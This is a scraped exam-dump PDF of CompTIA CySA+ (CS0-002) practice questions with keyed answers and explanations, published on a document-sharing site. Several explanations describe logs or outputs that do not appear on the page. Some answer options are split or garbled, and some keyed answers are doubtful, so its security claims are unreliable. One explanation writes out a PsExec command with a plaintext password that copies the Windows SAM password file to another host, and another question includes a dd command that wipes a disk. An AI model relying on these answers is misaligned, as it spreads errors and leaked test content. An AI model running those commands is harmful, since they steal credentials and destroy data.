0% found this document useful (0 votes)
66 views28 pages

cs0-002 2

Uploaded by

ppunkerr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
66 views28 pages

cs0-002 2

Uploaded by

ppunkerr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 28

100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader

https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

CS0-002 Dumps

CompTIA Cybersecurity Analyst (CySA+) Certification Exam

https://www.certleader.com/CS0-002-dumps.html

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

NEW QUESTION 1
After running the cat file01.bin | hexdump -c command, a security analyst reviews the following output snippet:
00000000 ff d8 ft e0 00 10 4a 46 49 46 00 01 01 00 00 01 |......JFIF......|
Which of the following digital-forensics techniques is the analyst using?

A. Reviewing the file hash


B. Debugging the binary file
C. Implementing file carving
D. Verifying the file type
E. Utilizing reverse engineering

Answer: D

Explanation:
This is the digital-forensics technique that the analyst is using by running the cat file01.bin | hexdump -c command. This command displays the contents of the
binary file in hexadecimal and ASCII format, which can help identify the file type based on its header or signature. In this case, the output snippet shows that the
file type is JPEG, as indicated by the ff d8 ff e0 bytes at the beginning and the JFIF string in ASCII.

NEW QUESTION 2
A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that contain SPI Pnor
to the deployment, the analyst should conduct:

A. a tabletop exercise
B. a business impact analysis
C. a PCI assessment
D. an application stress test.

Answer: C

Explanation:
A PCI assessment should be conducted prior to the deployment of a new application that contains SPI (Sensitive Personal Information). A PCI assessment is an
evaluation of how well an organization complies with the Payment Card Industry Data Security Standard (PCI DSS), which is a set of requirements for
protecting cardholder data. PCI DSS applies to any organization that stores, processes, or transmits cardholder data, such as credit card numbers, expiration
dates, or security codes4. A PCI assessment can help identify and remediate any gaps or weaknesses in the security controls of an application that handles
cardholder data.

NEW QUESTION 3
An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following
attack vectors is the vulnerability MOST likely targeting?

A. SCADA
B. CAN bus
C. Modbus
D. IoT

Answer: B

Explanation:
The Controller Area Network - CAN bus is a message-based protocol designed to allow the Electronic Control Units (ECUs) found in today’s automobiles, as well
as other devices, to communicate with each other in a reliable, priority-driven fashion. Messages or “frames” are received by all devices in the network, which
does not require a host computer.
CAN bus stands for Controller Area Network bus, which is a communication protocol that allows different devices and components in a vehicle to communicate
and exchange data. The vulnerability within the new fleet of vehicles is most likely targeting the CAN bus, because it could allow an attacker to manipulate or
disrupt the operation of the vehicle. SCADA, Modbus, and IoT are other terms related to communication protocols or systems, but they are not specific to vehicles.
Reference: https://www.csoonline.com/article/3218104/what-is-a-can-bus-and-how-can-it-be-hacked.html

NEW QUESTION 4
A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers
require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to
provide secure transport?

A. CASB
B. VPC
C. Federation
D. VPN

Answer: D

Explanation:
A VPN is a secure network connection that allows users to access their private corporate networks over the internet, while keeping the connection encrypted and
secure. This makes it an ideal solution for providing the development team with secure connectivity from the corporate network to a three-tier cloud environment.
https://www.comptia.org/content/virtual-private-networks

NEW QUESTION 5
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is concerned
with ensuring all devices are patched and running some sort of protection against malicious software. Which of the following existing technical controls should a
security analyst recommend to best meet all the requirements?

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A. EDR
B. Port security
C. NAC
D. Segmentation

Answer: A

Explanation:
EDR stands for endpoint detection and response, which is a type of security solution that monitors and protects all devices that are connected to a network, such
as laptops and mobile phones. EDR can help to ensure that all devices are patched and running some sort of protection against malicious software by providing
continuous visibility, threat detection, incident response, and remediation capabilities. EDR can also help to enforce security policies and compliance requirements
across all devices .

NEW QUESTION 6
A company is aiming to test a new incident response plan. The management team has made it clear that the initial test should have no impact on the environment.
The company has limited
resources to support testing. Which of the following exercises would be the best approach?

A. Tabletop scenarios
B. Capture the flag
C. Red team v
D. blue team
E. Unknown-environment penetration test

Answer: A

Explanation:
A tabletop scenario is an informal, discussion-based session in which a team discusses their roles and responses during an emergency, walking through one or
more example scenarios. A tabletop scenario is the best approach for a company that wants to test a new incident response plan without impacting the
environment or using many resources. A tabletop scenario can help the company identify strengths and weaknesses in their plan, clarify roles and responsibilities,
and improve communication and coordination among team members. The other options are more intensive and disruptive exercises that involve simulating a real
incident or attack. References: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 16;
https://www.linkedin.com/pulse/tabletop-exercises-explained-matt-lemon-phd

NEW QUESTION 7
A manufacturing company has joined the information sharing and analysis center for its sector. As a benefit, the company will receive structured loC data
contributed by other members. Which of the following best describes the utility of this data?

A. Other members will have visibility into Instances o' positive loC identification within me manufacturing company's corporate network.
B. The manufacturing company will have access to relevant malware samples from all other manufacturing sector members.
C. Other members will automatically adjust their security postures lo defend the manufacturing company's processes.
D. The manufacturing company can automatically generate security configurations for all of Its Infrastructure.

Answer: B

Explanation:
This best describes the utility of the structured loC data contributed by other members of the information sharing and analysis center (ISAC) for its sector. loC
stands for indicator of compromise, which is a piece of information that suggests a potential intrusion or attack, such as an IP address, a file hash, a domain name,
or a malware signature. By sharing loC data, the ISAC members can benefit from each other’s threat intelligence and improve their security defenses.

NEW QUESTION 8
A security officer needs to find the most cost-effective solution to the current data privacy and protection gap found in the last security assessment Which of the
following is the BEST recommendation?

A. Require users to sign NDAs


B. Create a data minimization plan.
C. Add access control requirements
D. Implement a data loss prevention solution

Answer: B

Explanation:
Creating a data minimization plan would be the most cost-effective solution to the current data privacy and protection gap found in the last security assessment.
Data minimization is a principle that states that organizations should collect, store, process, and retain only the minimum amount of personal data that is necessary
for their legitimate purposes. Data minimization can help reduce the risk of data breaches, data leaks, or data misuse by limiting the exposure and access to
sensitive data. Data minimization can also help comply with data protection regulations, such as the General Data Protection Regulation (GDPR), that require
organizations to justify their data collection and processing activities. Data minimization can be achieved by implementing various measures, such as deleting or
anonymizing unnecessary data, applying retention policies, or using encryption or pseudonymization techniques.

NEW QUESTION 9
A security operations manager wants some recommendations for improving security monitoring. The security team currently uses past events to create an IOC list
for monitoring.
Which of the following is the best suggestion for improving monitoring capabilities?

A. Update the IPS and IDS with the latest rule sets from the provider.
B. Create an automated script to update the IPS and IDS rule sets.
C. Use an automated subscription to select threat feeds for IDS.
D. Implement an automated malware solution on the IPS.

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Answer: C

Explanation:
Threat feeds are sources of information that provide timely and relevant data about current or emerging cyber threats, such as indicators of compromise (IOCs),
tactics, techniques, and procedures (TTPs), or threat actors. An IDS, or intrusion detection system, is a tool that monitors network traffic and detects malicious or
anomalous activities based on predefined or custom rules. Using an automated subscription to select threat feeds for IDS can help to improve security monitoring
capabilities by providing the security team with up-to-date and actionable intelligence that can enhance the detection and response to cyberattacks

NEW QUESTION 10
An analyst reviews the most recent vulnerability management report and notices a firewall with 99.98% required uptime is reporting different firmware versions on
scans than were reported in previous scans. The vendor released new firewall firmware a few months ago. Which of the following will the analyst most likely do
next given the requirements?

A. Request to route traffic through a secondary firewall


B. Check for change tickets.
C. Perform a credentialed scan
D. Request an exception to the uptime policy.

Answer: B

Explanation:
The analyst should check for change tickets as the next step, given that the firewall is reporting different firmware versions on scans than were reported in previous
scans. Change tickets are records of any authorized changes made to a system or a network, such as updating firmware, installing patches, or modifying
configurations. Checking for change tickets can help verify if the firmware change was intentional and approved, or if it was unauthorized or malicious.

NEW QUESTION 10
A cybersecunty analyst needs to harden a server that is currently being used as a web server The server needs to be accessible when entenng www company
com into the browser Additionally web pages require frequent updates which are performed by a remote contractor Given the following output:

Which of the following should the cybersecunty analyst recommend to harden the server? (Select TWO).

A. Uninstall the DNS service


B. Perform a vulnerability scan
C. Change the server's IP to a private IP address
D. Disable the Telnet service
E. Block port 80 with the host-based firewall
F. Change the SSH port to a non-standard port

Answer: DF

Explanation:
Disabling the Telnet service would harden the server by removing an insecure protocol that transmits data in cleartext and could allow unauthorized access to the
server. Changing the SSH port to a non-standard port would harden the server by reducing the exposure to brute-force attacks or port scans that target the default
SSH port (22). Uninstalling the DNS service, performing a vulnerability scan, changing the server’s IP to a private IP address, or blocking port 80 with the host-
based firewall would not harden the server or could affect its functionality as a web server. Reference:
https://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html

NEW QUESTION 11
An organization is concerned about the security posture of vendors with access to its facilities and systems. The organization wants to implement a vendor review
process to ensure \hi> policies implemented by vendors are in line with its own. Which of the following will provide the highest assurance of compliance?

A. An in-house red-team report


B. A vendor self-assessment report
C. An independent third-party audit report
D. Internal and external scans from an approved third-party vulnerability vendor

Answer: C

Explanation:
An independent third-party audit report can provide the highest assurance of compliance with the organization’s policies by vendors, as it involves an objective
and unbiased evaluation of the vendor’s security posture and practices by an external auditor who follows established standards and criteria. An independent third-
party audit report can help verify if the vendor meets the organization’s requirements and expectations, as well as identify any gaps or weaknesses that need to be
addressed.

NEW QUESTION 12
Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for
this type of evidence acquisition?

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A. Extract the hard drives from the compromised machines and then plug them into a forensics machine to apply encryption over the stored data to protect it from
nonauthorized access.
B. Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
C. Perform a disk sanitization using the command #dd if=/dev/zero of=/dev/sdc bs=1M over the media that will receive a copy of the collected data.
D. Execute the command #dd if-/dev/sda of=/dev/sdc bs=512 to clone the evidence data to external media to prevent any further change.

Answer: B

Explanation:
Building the chain-of-custody document is the procedure that must be completed first for this type of evidence acquisition. The chain-of-custody document is a
record that tracks the handling and custody of digital evidence from the time it is collected until it is presented in court. The chain-of-custody document should
include information such as the media model, serial number, size, vendor, date, and time of acquisition, as well as the names and signatures of the persons who
handled, transferred, or examined the evidence. The chain-of-custody document helps to preserve the integrity and admissibility of the evidence by preventing
tampering, alteration, or loss1.

NEW QUESTION 17
Which of the following best explains why it is important for companies to implement both privacy and security policies?

A. Private data is insecure by design, so different programs ensure both policies are addressed.
B. Security policies will automatically ensure the data complies with privacy regulations.
C. Privacy policies will satisfy all regulations to secure consumer and sensitive company data.
D. Both policies have some overlap, but the differences can have regulatory consequences.

Answer: D

Explanation:
The correct answer is D. Both policies have some overlap, but the differences can have regulatory consequences. Privacy and security policies are both important
for companies to protect their data and comply with various laws and regulations. However, privacy and security policies are not the same, and they have different
goals and requirements.
Privacy policies are nontechnical controls that define how a company collects, uses, shares, and protects personal information from its customers, employees, or
partners. Privacy policies are based on the principles of data minimization, consent, transparency, and accountability. Privacy policies aim to respect the rights and
preferences of data subjects and comply with different privacy regulations, such as the General Data Protection Regulation (GDPR) or the California Consumer
Privacy Act (CCPA)1.
Security policies are technical or nontechnical controls that define how a company protects its data and systems from unauthorized access, modification, or
destruction. Security policies are based on the principles of confidentiality, integrity, and availability. Security policies aim to prevent or mitigate the impact of
cyberattacks and comply with different security standards, such as the Payment Card Industry Data Security Standard (PCI DSS) or the ISO/IEC 27000 series2.
Privacy and security policies have some overlap, as they both involve data protection and compliance. However, they also have some differences, as they address
different aspects and risks of data processing. For example, a company may have a strong security policy that encrypts its data, but it may still violate a privacy
policy if it collects or shares more data than necessary or without consent. Conversely, a company may have a clear privacy policy that informs its customers about
its data practices, but it may still suffer a security breach if it does not implement adequate security measures3.

NEW QUESTION 21
A consultant evaluating multiple threat intelligence leads to assess potential risks for a client. Which of the following is the BEST approach for the consultant to
consider when modeling the client's attack surface?

A. Ask for external scans from industry peers, look at the open ports, and compare Information with the client.
B. Discuss potential tools the client can purchase lo reduce the livelihood of an attack.
C. Look at attacks against similar industry peers and assess the probability of the same attacks happening.
D. Meet with the senior management team to determine if funding is available for recommended solutions.

Answer: C

Explanation:
A good approach for modeling the client’s attack surface is to look at attacks against similar industry peers and assess the probability of the same attacks
happening. This can help the consultant to identify the most relevant and likely threats for the client based on their industry sector, size, location, and other factors.
This can also help the consultant to prioritize the most critical risks and recommend appropriate mitigation strategies. Asking for external scans from industry peers
(A) may not be feasible or reliable, as industry peers may not share their scan results or have different security configurations and vulnerabilities than the client.
Discussing potential tools the client can purchase (B) may not be effective, as tools alone cannot reduce the likelihood of an attack without proper implementation
and management. Meeting with senior management team (D) may not be helpful, as funding is not directly related to modeling the attack surface and may depend
on other factors such as budget constraints and risk appetite.

NEW QUESTION 25
A team of network security analysts is examining network traffic to determine if sensitive data was exfiltrated. Upon further investigation, the analysts believe
confidential data was compromised. Which of the following capabilities would BEST defend against this type of sensitive data exfiltration?

A. Deploy an edge firewall.


B. Implement DLP
C. Deploy EDR.
D. Encrypt the hard drives

Answer: B

Explanation:
DLP, or Data Loss Prevention, is a cybersecurity solution that detects and prevents data breaches. It blocks the extraction of sensitive data and prevents the
unauthorized or inappropriate sharing, transfer, or use of data. It also helps organizations comply with data protection regulations and policies1
DLP can help defend against sensitive data exfiltration by monitoring and controlling data movement across networks, devices, applications, and cloud services.
DLP can also alert or block users from sending or uploading sensitive data to untrusted destinations or recipients.

NEW QUESTION 28

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no
following should the analyst review FIRST?

A. The DNS configuration


B. Privileged accounts
C. The IDS rule set
D. The firewall ACL

Answer: C

Explanation:
The security analyst should review the IDS rule set first. The IDS (Intrusion Detection System) is a tool that monitors network traffic and alerts on any suspicious or
malicious activity. The IDS rule set is a set of conditions or patterns that define what constitutes normal or abnormal behavior on the network. The IDS rule set can
affect the number of security incidents being reported, as it determines what triggers an alert or not3. The security analyst should review the IDS rule set to check if
it is up to date, accurate, and comprehensive. If the IDS rule set is outdated, inaccurate, or incomplete, it may miss some incidents or generate false positives or
negatives.

NEW QUESTION 33
While reviewing system logs, a network administrator discovers the following entry:

Which of the following occurred?

A. An attempt was made to access a remote workstation.


B. The PsExec services failed to execute.
C. A remote shell failed to open.
D. A user was trying to download a password file from a remote system.

Answer: D

Explanation:
The output shows an entry from a system log that indicates a user was trying to download a password file from a remote system using PsExec. PsExec is a
command-line tool that allows users to execute processes on remote systems. The entry shows that the user “administrator” tried to run PsExec with the following
parameters: \192.168.1.100 -u administrator -p P@ssw0rd -c cmd.exe /c type c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt This means that
the user tried to connect to the remote system with IP address 192.168.1.100 using the username “administrator” and password “P@ssw0rd”, copy cmd.exe to
the remote system, and execute it with the command “type c:\windows\system32\config\SAM > \192.168.1.101\c$\temp\sam.txt”. This command attempts to read
the SAM file, which contains hashed passwords of local users, and write it to a file on another system with IP address 192.168.1.101. References: CompTIA
Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 8; https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

NEW QUESTION 34
Which of the following attack techniques has the GREATEST likelihood of quick success against Modbus assets?

A. Remote code execution


B. Buffer overflow
C. Unauthenticated commands
D. Certificate spoofing

Answer: C

Explanation:
Modbus is a communication protocol that is widely used in industrial control systems (ICS). Modbus does not have any built-in security features, such as
authentication or encryption, which makes it vulnerable to various attacks. One of the most common and effective attack techniques against Modbus assets is to
send unauthenticated commands to manipulate or disrupt the operation of the devices. Remote code execution, buffer overflow, and certificate spoofing are other
attack techniques, but they have less likelihood of quick success against Modbus assets. Reference:
https://www.sciencedirect.com/science/article/pii/S2405959517300045

NEW QUESTION 37
A security team has begun updating the risk management plan incident response plan and system security plan to ensure compliance with secunty review
guidelines Which of the (olowing can be executed by internal managers to simulate and validate the proposed changes'?

A. Internal management review


B. Control assessment
C. Tabletop exercise
D. Peer review

Answer: C

Explanation:
A tabletop exercise is a simulation of a security incident or scenario that involves the participation of key stakeholders and decision-makers. It can be used to test
and validate the effectiveness of the organization’s plans, policies, and procedures, such as the risk management plan, incident response plan, and system
security plan. A tabletop exercise can also help identify gaps or weaknesses in the plans and improve the communication and coordination among the participants.
An internal management review, a control assessment, a peer review, or a scripting are other possible methods to evaluate and validate a new product’s security
capabilities, but they are not as comprehensive or interactive as a tabletop exercise. Reference: https://www.csoonline.com/article/3444488/what-is-a-tabletop-
exercise-how-to-run-a-security-scenario-in-6-ste

NEW QUESTION 41
During a risk assessment, a senior manager inquires about what the cost would be if a unique occurrence would impact the availability of a critical service. The
service generates $1 ,000 in revenue for the organization. The impact of the attack would affect 20% of the server's capacity to perform jobs. The organization

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

expects that five out of twenty attacks would succeed during the year. Which of the following is the calculated single loss expectancy?

A. $200
B. $800
C. $5,000
D. $20,000

Answer: A

Explanation:
The single loss expectancy (SLE) is a measure of the monetary loss associated with a single occurrence of a risk. The SLE can be calculated by multiplying the
asset value (AV) by the exposure factor (EF), which is the percentage of loss that the asset would suffer if the risk occurred. In this case, the asset value is the
revenue generated by the service, which is $1,000. The exposure factor is the impact of the attack on the server’s capacity, which is 20%. Therefore, the SLE is
$1,000 x 0.2 = $2001.

NEW QUESTION 46
A systems administrator believes a user's workstation has been compromised. The workstation's performance has been lagging significantly for the past several
hours. The administrator runs the task list
/ v command and receives the following output:

Which of the following should a security analyst recognize as an indicator of compromise?

A. dwm.exe being executed under the user context


B. The high usage of vscod
C. exe * 32
D. The abnormal behavior of paint.exe
E. svchost.exe being executed as SYSTEM

Answer: B

Explanation:
The tasklist command is used to display a list of all running processes on a system. In this output, the security analyst should recognize the high memory usage
(1302103K) of vscode.exe * 32, which is an indication that this process is consuming a large amount of system resources. This could be a sign that the system has
been compromised, as malware often uses system resources to perform malicious activities.

NEW QUESTION 48
A security is reviewing a vulnerability scan report and notes the following finding:

As part of the detection and analysis procedures, which of the following should the analyst do NEXT?

A. Patch or reimage the device to complete the recovery


B. Restart the antiviruses running processes
C. Isolate the host from the network to prevent exposure
D. Confirm the workstation's signatures against the most current signatures.

Answer: D

Explanation:
The vulnerability scan report shows that the workstation has a high-risk vulnerability (CVE-2019-0708) that affects Remote Desktop Services on Windows systems.
This vulnerability allows remote code execution without authentication or user interaction, and can be exploited by sending specially crafted requests to the
target system1
As part of the detection and analysis procedures, the analyst should confirm the workstation’s
signatures against the most current signatures. This can help verify if the workstation has been patched or updated to address the vulnerability, or if it is still
vulnerable and needs remediation. The analyst can use tools such as Windows Update or Microsoft Baseline Security Analyzer to check the workstation’s patch
level and compare it with the latest available signatures.

NEW QUESTION 53
As part of the senior leadership team's ongoing nsk management activities the Chief Information Security Officer has tasked a security analyst with coordinating
the right training and testing methodology to respond to new business initiatives or significant changes to existing ones The management team wants to examine a
new business process that would use existing infrastructure to process and store sensitive data Which of the following would be appropnate for the security analyst
to coordinate?

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A. A black-box penetration testing engagement


B. A tabletop exercise
C. Threat modeling
D. A business impact analysis

Answer: C

Explanation:
Threat modeling is a process that helps identify and analyze the potential threats and vulnerabilities of a system or process. It can help evaluate the security risks
and mitigation strategies of a new business process that would use existing infrastructure to process and store sensitive data. A black-box penetration testing
engagement, a tabletop exercise, or a business impact analysis are other methods that can be used to assess the security or resilience of a system or process, but
they are not as appropriate as threat modeling for coordinating the right training and testing methodology to respond to new business initiatives or significant
changes to existing ones. Reference: https://owasp.org/www-community/Application_Threat_Modeling

NEW QUESTION 55
A small business does not have enough staff in the accounting department to segregate duties. The controller writes the checks for the business and reconciles
them against the ledger. To ensure there is no fraud occurring, the business conducts quarterly reviews in which a different officer in the business compares all the
cleared checks against the ledger. Which of the following BEST describes this type of control?

A. Deterrent
B. Preventive
C. Compensating
D. Detective

Answer: C

Explanation:
A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure that is deemed too
difficult or impractical to implement at the present time.
"Compensating controls are additional security measures that you take to address a vulnerability without remediating the underlying issue."
A compensating control is a control that reduces the risk of an existing or potential control weakness2
In this case, the lack of segregation of duties in the accounting department is a control weakness that increases the risk of fraud or error. The quarterly reviews by
a different officer are a compensating control that reduces this risk by providing an independent verification of the transactions recorded by the controller.

NEW QUESTION 56
During a routine review of service restarts a security analyst observes the following in a server log:

Which of the following is the GREATEST security concern?

A. The daemon's binary was AChanged


B. Four consecutive days of monitoring are skipped in the tog
C. The process identifiers for the running service change
D. The PIDs are continuously changing

Answer: A

Explanation:
A daemon is a program that runs in the background on a system and performs certain tasks or services without user intervention. A daemon’s binary is the
executable file that contains the code and instructions for the daemon to run. The server log shows that the daemon’s binary was changed on Aug 1 2020 at
00:00:01 by an unknown user with UID 0 (root). This is the greatest security concern, because it could indicate that an attacker has gained root access to the
system and modified the daemon’s binary with malicious code that could compromise the system’s security or functionality. Four consecutive days of monitoring
being skipped in the log, the process identifiers for the running service changing, or the PIDs continuously changing are not security concerns, but rather normal
events that could occur due to system maintenance, updates, restarts, or scheduling. Reference: https://www.linux.com/training-tutorials/what-are-linux-daemons/

NEW QUESTION 60
A security analyst needs to automate the incident response process for malware infections. When the following logs are generated, an alert email should
automatically be sent within 30 minutes:

Which of the following is the best way for the analyst to automate alert generation?

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A. Deploy a signature-based IDS


B. Install a UEBA-capable antivirus
C. Implement email protection with SPF
D. Create a custom rule on a SIEM

Answer: D

Explanation:
A security information and event management (SIEM) system is a tool that collects and analyzes log data from various sources and provides alerts and reports on
security incidents and events. A security analyst can create a custom rule on a SIEM system to automate the incident response process for malware infections. For
example, the analyst can create a rule that triggers an alert email when the SIEM system detects logs that match the criteria of malware infection, such as process
name, file name, file hash, etc. The alert email can be sent within 30 minutes or any other desired time frame. The other options are not suitable or sufficient for
this purpose. References: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 15;
https://www.sans.org/reading-room/whitepapers/analyst/security-information-event-management-siem-impleme

NEW QUESTION 63
A company is setting up a small, remote office to support five to ten employees. The company's home office is in a different city, where the company uses a cloud
service provider for its business applications and a local server to host its data. To provide shared access from the remote office to the local server and the
business applications, which of the following would be the easiest and most secure solution?

A. Use a VPC to host the company's data and keep the current solution for the business applications.
B. Use a new server for the remote office to host the data and keep the current solution for the business applications.
C. Use a VDI for the home office and keep the current solution for the business applications.
D. Use a VPN to access the company's data in the home office and keep the current solution for the business applications.

Answer: D

Explanation:
The correct answer is D. Use a VPN to access the company’s data in the home office and keep the current solution for the business applications. A virtual private
network (VPN) is a technology that creates a secure and encrypted connection over a public network, such as the internet. A VPN can allow users to access
resources on a remote network, such as a server, as if they were on the same local network. A VPN can provide shared access from the remote office to the
company’s data in the home office, while maintaining security and privacy1.

NEW QUESTION 66
Which of the following describes the mam difference between supervised and unsupervised machine-learning algorithms that are used in cybersecurity
applications?

A. Supervised algorithms can be used to block attacks, while unsupervised algorithms cannot.
B. Supervised algorithms require security analyst feedback, while unsupervised algorithms do not.
C. Unsupervised algorithms are not suitable for IDS systems, white supervised algorithms are
D. Unsupervised algorithms produce more false positive
E. Than supervised algorithms.

Answer: B

Explanation:
Supervised and unsupervised machine-learning algorithms are two types of machine-learning methods that are used in cybersecurity applications. Machine
learning is a branch of artificial intelligence that enables systems to learn from data and improve their performance without explicit programming.
Supervised machine-learning algorithms are trained on labeled data, which means that each data point has a known outcome or class. Supervised algorithms
learn to map input data to output data by finding patterns or rules from the training data. Supervised algorithms require security analyst feedback to provide labels
for the data and evaluate the accuracy of the algorithm’s predictions. Examples of supervised machine-learning algorithms are classification and regression.
Unsupervised machine-learning algorithms are trained on unlabeled data, which means that each data point has no known outcome or class. Unsupervised
algorithms learn to discover hidden structures or patterns from the data without any guidance or feedback. Unsupervised algorithms do not require security analyst
feedback, as they do not rely on predefined labels or outcomes. Examples of unsupervised machine-learning algorithms are clustering and anomaly detection.

NEW QUESTION 70
A security analyst is reviewing WAF alerts and sees the following request:

Which of the following BEST describes the attack?

A. SQL injection
B. LDAP injection
C. Command injection
D. Denial of service

Answer: A

Explanation:
The attack is a SQL injection attack. SQL injection is a type of attack that exploits a security vulnerability in an application’s software that allows user input to be
executed as SQL commands by the underlying database3. SQL injection can enable an attacker to perform various malicious actions on the database, such as
reading, modifying, deleting or creating data; executing commands; or bypassing authentication. The request shows that the attacker has entered a malicious SQL
statement in the username parameter that attempts to drop (delete) all tables in the database.

NEW QUESTION 73
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company executives. Which
of the following would be BEST for the analyst to configure to achieve this objective?

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

A. A TXT record on the name server for SPF


B. DNSSEC keys to secure replication
C. Domain Keys identified Man
D. A sandbox to check incoming mad

Answer: C

Explanation:
Domain Keys Identified Mail (DKIM) is an email authentication method that uses a digital signature to let the
receiver of an email know that the message was sent and authorized by the owner of a domain1
DKIM helps prevent phishing emails that spoof or impersonate other domains by verifying the identity and integrity of the sender. DKIM works by adding a DKIM
signature header to each outgoing email message, which contains a hash value of selected parts of the message and the domain name of the sender. The
sender’s domain also publishes a public key in its DNS records, which can be used by the receiver to decrypt the DKIM signature and compare it with its own
hash value of the message. If they match, it means that the message was not altered in transit and that it came from the claimed domain.

NEW QUESTION 74
A security analyst identified one server that was compromised and used as a data making machine, and a few of the hard drive that was created. Which of the
following will MOST likely provide information about when and how the machine was compromised and where the malware is located?

A. System timeline reconstruction


B. System registry extraction
C. Data carving
D. Volatile memory analysts

Answer: A

Explanation:
System timeline reconstruction is a forensic analysis technique that involves creating a chronological record of events that occurred on a system based on various
sources of evidence such as log files, registry entries, file timestamps, network traffic, etc. System timeline reconstruction can provide information about when and
how the machine was compromised and where the malware is located by showing when suspicious activities or changes took place on the system, such as
unauthorized access attempts, file creation or modification, process execution, network connections, etc.

NEW QUESTION 76
Which of me following are reasons why consumer IoT devices should be avoided in an enterprise environment? (Select TWO)

A. Message queuing telemetry transport does not support encryption.


B. The devices may have weak or known passwords.
C. The devices may cause a dramatic Increase in wireless network traffic.
D. The devices may utilize unsecure network protocols.
E. Multiple devices may interface with the functions of other loT devices.
F. The devices are not compatible with TLS 12.

Answer: BD

Explanation:
Consumer IoT devices are devices that connect to the internet and provide various functions or services for personal or home use, such as smart speakers,
cameras, thermostats, etc. Consumer IoT devices should be avoided in an enterprise environment because they may pose security risks or challenges for the
organization’s network and data. Some of the reasons why consumer IoT devices should be avoided are:
The devices may have weak or known passwords: Many consumer IoT devices come with default or hardcoded passwords that are easy to guess or find
online. Some devices may not allow users to change their passwords or enforce strong password policies. This can make them vulnerable to brute-force attacks or
unauthorized access by attackers.
The devices may utilize unsecure network protocols: Many consumer IoT devices use unsecure network protocols to communicate with other devices or
servers, such as HTTP, FTP, Telnet, etc. These protocols do not encrypt or authenticate the data they transmit or receive, which can expose them to interception,
modification, or spoofing by attackers.

NEW QUESTION 78
Which of the following solutions is the BEST method to prevent unauthorized use of an API?

A. HTTPS
B. Geofencing
C. Rate liming
D. Authentication

Answer: D

Explanation:
Authentication is a method of verifying a user’s identity by requiring some piece of evidence, such as something the user knows (e.g., password), something the
user has (e.g., token), or something the user is (e.g., fingerprint). Authentication is the best method to prevent unauthorized use of an API, because it ensures that
only legitimate users can access or use the API functions or data. HTTPS, geofencing, or rate limiting are other methods that can enhance the security or
performance of an API, but they do not prevent unauthorized use of an API. Reference: https://www.redhat.com/en/topics/api/what-is-api-security

NEW QUESTION 82
A threat feed disclosed a list of files to be used as an loC for a zero-day vulnerability. A cybersecurity analyst decided to include a custom lookup for these files on
the endpoint's log-in script as a mechanism to:

A. automate malware signature creation.


B. close the threat intelligence cycle loop.
C. generate a STIX object for the TAXII server

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

